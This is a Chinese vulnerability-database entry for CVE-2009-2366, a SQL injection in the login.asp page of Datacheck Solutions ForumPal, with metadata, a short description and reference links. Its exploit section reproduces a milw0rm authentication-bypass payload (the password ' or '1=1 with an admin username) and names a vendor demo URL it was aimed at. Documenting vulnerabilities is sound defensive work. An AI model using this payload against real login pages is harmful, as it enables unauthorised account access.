datachecknh forumpal login.asp SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118016 漏洞类型 SQL注入
发布时间 2009-06-26 更新时间 2009-06-26
CVE编号 CVE-2009-2366 CNNVD-ID CNNVD-200907-114
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9024
https://www.securityfocus.com/bid/43742
https://cxsecurity.com/issue/WLB-2009070116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-114
|漏洞详情
DataCheckSolutionsForumPalFE1.1版本和ForumPal1.5版本中的login.asp存在SQL注入漏洞允许远程攻击者借助(1)1.1版本中的密码参数和(2)1.5版本中的P-密码参数执行任意的SQL命令。
|漏洞EXP
--------------------------------------------------------------
ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.datachecknh.com
Software :ForumPal v1.5
Note: Je m'appel Tecktonik
---------------------------------------------------------------
Exploit1:
-------
Username: [Real_name_admin]
Password:' or '1=1
----------------------------------------------------------------
Dem0
----
http://www.datachecknh.com/forumpal_FE_Demo/login.asp
EXPLOIT fOR DEMO
Username: admin
Password:' or '1=1
--------------------------------------
His0k4  - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r.
-----------------------------------------------------------------

# milw0rm.com [2009-06-26]
|受影响的产品
Datacheck Solutions ForumPal 1.5
|参考资料

来源:XF
名称:datacheck-login-sql-injection(51403)
链接:http://xforce.iss.net/xforce/xfdb/51403
来源:OSVDB
名称:55497
链接:http://www.osvdb.org/55497
来源:OSVDB
名称:55496
链接:http://www.osvdb.org/55496
来源:MILW0RM
名称:9024
链接:http://www.milw0rm.com/exploits/9024
来源:SECUNIA
名称:35603
链接:http://secunia.com/advisories/35603
来源:SECUNIA
名称:35589
链接:http://secunia.com/advisories/35589